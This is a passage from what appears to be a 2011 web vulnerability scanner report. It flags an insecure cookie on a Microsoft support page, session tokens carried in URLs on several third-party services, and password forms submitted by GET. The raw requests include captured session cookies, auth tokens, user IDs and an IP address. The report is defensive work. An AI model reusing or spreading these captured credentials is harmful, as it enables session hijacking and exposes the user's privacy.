GET /Default.aspx?&st=1&wfxredirect=1 HTTP/1.1
Host: support.discoverbing.com
Connection: keep-alive
Referer: http://onlinehelp.microsoft.com/en-us/bing/ff808415.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1307200261952; bingresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22DDINPROGRESS%22%2C%22url%22%3A%22http%253A//social.discoverbing.com/%22%2C%22timestamp%22%3A1307372850950%7D%2C%22lastinvited%22%3A1307372850950%2C%22userid%22%3A%221307361123212927392730955034%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p102855664%22%5D%7D; s_cc=true; s_vnum=1313680622771%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

9.6. https://support.microsoft.com/oas/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.microsoft.com
Path:	/oas/default.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

.ASPXANONYMOUS=aHUt_bp8zAEkAAAAYjViMGEzZTItOWU1Mi00Y2VlLWE3MjEtNjY2MGIyMzIyZjYyJfMVJh6UZqW5TeDVVnL_QDHcErA1; expires=Tue, 27-Sep-2011 02:13:04 GMT; path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oas/default.aspx?gprid=assistance&st=1&wfxredirect=1&sd=gn HTTP/1.1
Host: support.microsoft.com
Connection: keep-alive
Referer: https://support.microsoft.com/oas/default.aspx?gprid=assistance&st=1&wfxredirect=1&sd=gn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; tbcu_sc_prodact_master99838=0; ST_GN_EN-US=6_0_0; fmsmemo=st=|13083|13701|13703; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.NumberOfVisits=5&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=72&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; exitinfo=gp|1033|csa|en-us||L_174092; WFXSMCToken=1; MS0=e2380e0986da4be1b66f0ac9e9764ae5; .ASPXANONYMOUS=4Xrk9Lp8zAEkAAAAYjg5MmIyNDgtMGJjYS00OGQxLTgxZGQtNGNhNWM5NWViODEwBZINl8tYmsqgVQ-Ji-Ezy2ZuByE1; AuthKey=SMC; WFXLANG=en-us; sdninc=8; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078786002:ss=1311077969178; wedcsinc=5; fmshb=0,1311089586085

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=aHUt_bp8zAEkAAAAYjViMGEzZTItOWU1Mi00Y2VlLWE3MjEtNjY2MGIyMzIyZjYyJfMVJh6UZqW5TeDVVnL_QDHcErA1; expires=Tue, 27-Sep-2011 02:13:04 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:33:03 GMT
Content-Length: 38036

<html lang="en-US"><head><meta name="ms.gsfxversion" content="7.6.9.0" /><meta name="ms.sup_cid" content="oas" /><meta name="ms.sup_cln" content="en-us" /><meta name="ms.sup_ct" content="dm" /><meta n
...[SNIP]...

10. Session token in URL previous next
There are 9 instances of this issue:

http://api.brightcove.com/services/library
http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log
http://digg.com/ajax/tooltip/submit
http://l.sharethis.com/pview
http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard
http://sales.liveperson.net/hc/21661174/
http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard
http://wd.sharethis.com/api/sharer.php
http://www.facebook.com/extern/login_status.php

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

10.1. http://api.brightcove.com/services/library previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://api.brightcove.com
Path:	/services/library

Issue detail

The URL in the request appears to contain a session token within the query string:

http://api.brightcove.com/services/library?command=find_video_by_id&video_id=1065857809001&callback=BCHTML5.handleVideo&media_delivery=http&token=mSs7049lqF2NZe_nAJNIDg1FQDco9YtZEk8YfbwYAEo.&video_fields=id,name,shortDescription,linkURL,linkText,thumbnailURL,videoStillURL,renditions,FLVURL&_=1311108201830

Request

GET /services/library?command=find_video_by_id&video_id=1065857809001&callback=BCHTML5.handleVideo&media_delivery=http&token=mSs7049lqF2NZe_nAJNIDg1FQDco9YtZEk8YfbwYAEo.&video_fields=id,name,shortDescription,linkURL,linkText,thumbnailURL,videoStillURL,renditions,FLVURL&_=1311108201830 HTTP/1.1
Host: api.brightcove.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Tue, 19 Jul 2011 16:38:49 EDT
Cache-Control: must-revalidate,max-age=0
Content-Type: application/json;charset=UTF-8
Content-Length: 2773
Date: Tue, 19 Jul 2011 20:43:16 GMT
Server:

BCHTML5.handleVideo({"id":1065857809001,"name":"Not counting calories","shortDescription":"(Boston Globe) In today's Big Story, Kay Lazar has the results of a new study that says calorie information i
...[SNIP]...

10.2. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://dev.virtualearth.net
Path:	/webservices/v1/LoggingService/LoggingService.svc/Log

Issue detail

The URL in the request appears to contain a session token within the query string:

http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=0&fmt=1&type=3&group=MapControl&name=AJAX&version=6.3.20091207154938.04&session=1311082869251&mkt=en-us&auth=Ahn5L376ymB7iE0SUTiv0-mqke-onEds0hDyR5WF9uaGYphF-L3tsU6i7xcT-B5H&&jsonp=LogCredCB1311082691897&

Request

GET /webservices/v1/LoggingService/LoggingService.svc/Log?entry=0&fmt=1&type=3&group=MapControl&name=AJAX&version=6.3.20091207154938.04&session=1311082869251&mkt=en-us&auth=Ahn5L376ymB7iE0SUTiv0-mqke-onEds0hDyR5WF9uaGYphF-L3tsU6i7xcT-B5H&&jsonp=LogCredCB1311082691897& HTTP/1.1
Host: dev.virtualearth.net
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-BM-Srv: BL2M002304
X-MS-BM-WS-INFO: 0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:44 GMT
Content-Length: 155

LogCredCB1311082691897({"sessionId" : "AkTQo3bd59vuEUXkzSEUoUXzjq0aKILJmxS14wthghRypWy4debLAboh77ZwaezU", "authenticationResultCode" : "ValidCredentials"})

10.3. http://digg.com/ajax/tooltip/submit previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://digg.com
Path:	/ajax/tooltip/submit

Issue detail

The URL in the request appears to contain a session token within the query string:

http://digg.com/ajax/tooltip/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2

Request

GET /ajax/tooltip/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2 HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://digg.com/submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2; traffic_control=f041000000601100001689866400%3A221%3A112; __utma=146621099.1841421009.1311085718.1311085718.1311085718.1; __utmb=146621099.1.10.1311085718; __utmc=146621099; __utmz=146621099.1311085718.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=146621099.|1=Tests=%2C115%3DN%2C122%3DN%2C164%3DN%2C214%3DN%2C220%3DN=1,2=Users=f%3DN%2Ct%3DN%2Cu%3D_=1; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; undefined_s=First%20Visit; s_nr=1311085718020; s_vnum=1313677718021%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=19213 10.2.129.145
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Content-Type: application/json
Content-Length: 759

{"event":"digg:tooltip","data":{"html":"<div class=\"tooltip \">\n <div class=\"tooltip-pointer\"><\/div>\n <a class=\"close-it tooltip-dismiss\"><span>x<\/span><\/a>\n <p class=\"tooltip-hea
...[SNIP]...

10.4. http://l.sharethis.com/pview previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://l.sharethis.com
Path:	/pview

Issue detail

The URL in the request appears to contain a session token within the query string:

http://l.sharethis.com/pview?event=pview&source=share4x&publisher=f182be89-e43d-46bc-88dd-05fd82e682c0&hostname=www.factset.com&location=%2Fproducts%2Fim&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fim&sessionID=1311085609430.33334&fpc=301c176-13142cac1d6-364e5fca-1&ts1311085610124.0&refDomain=www.fakereferrerdominator.com&refQuery=RefParName%3DRefValue

Request

GET /pview?event=pview&source=share4x&publisher=f182be89-e43d-46bc-88dd-05fd82e682c0&hostname=www.factset.com&location=%2Fproducts%2Fim&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fim&sessionID=1311085609430.33334&fpc=301c176-13142cac1d6-364e5fca-1&ts1311085610124.0&refDomain=www.fakereferrerdominator.com&refQuery=RefParName%3DRefValue HTTP/1.1
Host: l.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/im
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Tue, 19 Jul 2011 14:26:43 GMT
Connection: keep-alive

10.5. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://realnetworksrealarca.tt.omtrdc.net
Path:	/m2/realnetworksrealarca/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard?mboxHost=support.gamehouse.com&mboxSession=1311107151665-897688&mboxPage=1311107151665-897688&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxXDomain=x-only&mboxCount=1&mbox=gh-global&mboxId=0&mboxTime=1311089154536&mboxURL=http%3A%2F%2Fsupport.gamehouse.com%2F&mboxReferrer=&mboxVersion=40

Request

GET /m2/realnetworksrealarca/mbox/standard?mboxHost=support.gamehouse.com&mboxSession=1311107151665-897688&mboxPage=1311107151665-897688&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxXDomain=x-only&mboxCount=1&mbox=gh-global&mboxId=0&mboxTime=1311089154536&mboxURL=http%3A%2F%2Fsupport.gamehouse.com%2F&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: realnetworksrealarca.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1311107151665-897688.17; Domain=realnetworksrealarca.tt.omtrdc.net; Expires=Tue, 02-Aug-2011 20:25:48 GMT; Path=/m2/realnetworksrealarca
Content-Type: text/javascript
Content-Length: 1402
Date: Tue, 19 Jul 2011 20:25:48 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('gh-global',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-gh-glo
...[SNIP]...

10.6. http://sales.liveperson.net/hc/21661174/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/hc/21661174/

Issue detail

The URL in the request appears to contain a session token within the query string:

http://sales.liveperson.net/hc/21661174/?&visitor=16101514677756&msessionkey=5504769704751670663&site=21661174&cmd=mTagStartPage&lpCallId=745677900034-84418076789&protV=20&lpjson=1&page=http%3A//support.microsoft.com/contactus/&id=8564492554&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-NA.EN.CS.CON.PSTSLS.GENERAL&activePlugin=none&cobrowse=true&PV%21unit=NA.EN.CS.CON.PSTSLS.GENERAL&PV%21pageLoadTime=6%20sec&PV%21visitorActive=1&SV%21ExternalID=Chat1311088769136&SV%21langSelection=en-us&title=Help%20and%20Support&cobrowse=true

Request

GET /hc/21661174/?&visitor=16101514677756&msessionkey=5504769704751670663&site=21661174&cmd=mTagStartPage&lpCallId=745677900034-84418076789&protV=20&lpjson=1&page=http%3A//support.microsoft.com/contactus/&id=8564492554&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-NA.EN.CS.CON.PSTSLS.GENERAL&activePlugin=none&cobrowse=true&PV%21unit=NA.EN.CS.CON.PSTSLS.GENERAL&PV%21pageLoadTime=6%20sec&PV%21visitorActive=1&SV%21ExternalID=Chat1311088769136&SV%21langSelection=en-us&title=Help%20and%20Support&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDAQTRSRBT=BCEBMKKDBBGCPDLELDBDMCBE

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:19:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_21661174=STANDALONE; path=/hc/21661174
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 19 Jul 2011 15:19:33 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1997

lpConnLib.Process({"ResultSet": {"lpCallId":"745677900034-84418076789","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton(
...[SNIP]...

10.7. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://stubhub.tt.omtrdc.net
Path:	/m2/stubhub/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard?mboxHost=www.stubhub.com&mboxSession=1311100546147-926694&mboxPC=1308447436655-203098.17&mboxPage=1311100546147-926694&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxCount=1&pageType=BrowseTicketDetail&section=Concert%20tickets&mbox_channelId=1&mbox_genre_grand_parent_id=63914&mbox_genre_parent=602&mbox_event_id=906484&mbox=Global&mboxId=0&mboxTime=1311082546212&mboxURL=http%3A%2F%2Fwww.stubhub.com%2F%3Fticket_id%3D303237644%26GCID%3DC12289x970%26quantity_selected%3D2%26gtkw%3D-640518298&mboxReferrer=http%3A%2F%2Fbing.fansnap.com%2Fcheckout%2Findex%2F418563179%3Fctx%3Dc%253Dtix%253Bmt%253Dint%253Btsp%253D0%253Bdt%253D1%253Blpos%253D2%26ch%3Dbing%26quantity%3D2%26lp%3Dtrue%26poctx%3Drank%253D36%253BcrawlScore%253Dnull%253Bpop1%253D0.0374%253Bpop2%253D0.0374%253Bpop3%253D0.0374%253B%26afm%3D%26uet%3D-776896836%253A7925%253Apgstickets%257C%257Cbing%257Cmt%253Aint%253Bsz%253A1254%253Bid%253A389669&mboxVersion=40

Request

GET /m2/stubhub/mbox/standard?mboxHost=www.stubhub.com&mboxSession=1311100546147-926694&mboxPC=1308447436655-203098.17&mboxPage=1311100546147-926694&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxCount=1&pageType=BrowseTicketDetail&section=Concert%20tickets&mbox_channelId=1&mbox_genre_grand_parent_id=63914&mbox_genre_parent=602&mbox_event_id=906484&mbox=Global&mboxId=0&mboxTime=1311082546212&mboxURL=http%3A%2F%2Fwww.stubhub.com%2F%3Fticket_id%3D303237644%26GCID%3DC12289x970%26quantity_selected%3D2%26gtkw%3D-640518298&mboxReferrer=http%3A%2F%2Fbing.fansnap.com%2Fcheckout%2Findex%2F418563179%3Fctx%3Dc%253Dtix%253Bmt%253Dint%253Btsp%253D0%253Bdt%253D1%253Blpos%253D2%26ch%3Dbing%26quantity%3D2%26lp%3Dtrue%26poctx%3Drank%253D36%253BcrawlScore%253Dnull%253Bpop1%253D0.0374%253Bpop2%253D0.0374%253Bpop3%253D0.0374%253B%26afm%3D%26uet%3D-776896836%253A7925%253Apgstickets%257C%257Cbing%257Cmt%253Aint%253Bsz%253A1254%253Bid%253A389669&mboxVersion=40 HTTP/1.1
Host: stubhub.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 87
Date: Tue, 19 Jul 2011 18:36:22 GMT
Server: Test & Target

mboxFactories.get('default').get('Global',0).setOffer(new mboxOfferDefault()).loaded();

10.8. http://wd.sharethis.com/api/sharer.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://wd.sharethis.com
Path:	/api/sharer.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://wd.sharethis.com/api/sharer.php?destination=stumbleupon&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private%20Equity%2C%20Venture%20Capital%2C%20Ownership%2C%20M%26A%2C%20Idea%20Screening%2C%20Reporting%20%7C%20FactSet%20Research%20Systems&publisher=f182be89-e43d-46bc-88dd-05fd82e682c0&fpc=301c176-13142cac1d6-364e5fca-2&sessionID=1311085619964.89430&source=chicklet&service=legacy&type=null

Request

GET /api/sharer.php?destination=stumbleupon&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private%20Equity%2C%20Venture%20Capital%2C%20Ownership%2C%20M%26A%2C%20Idea%20Screening%2C%20Reporting%20%7C%20FactSet%20Research%20Systems&publisher=f182be89-e43d-46bc-88dd-05fd82e682c0&fpc=301c176-13142cac1d6-364e5fca-2&sessionID=1311085619964.89430&source=chicklet&service=legacy&type=null HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.53
Date: Tue, 19 Jul 2011 14:28:23 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Location: http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems
Content-Length: 0

10.9. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.24.34
X-Cnection: close
Date: Tue, 19 Jul 2011 14:24:23 GMT
Content-Length: 0

11. Password field submitted using GET method previous next
There are 2 instances of this issue:

http://digg.com/submit
http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

11.1. http://digg.com/submit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

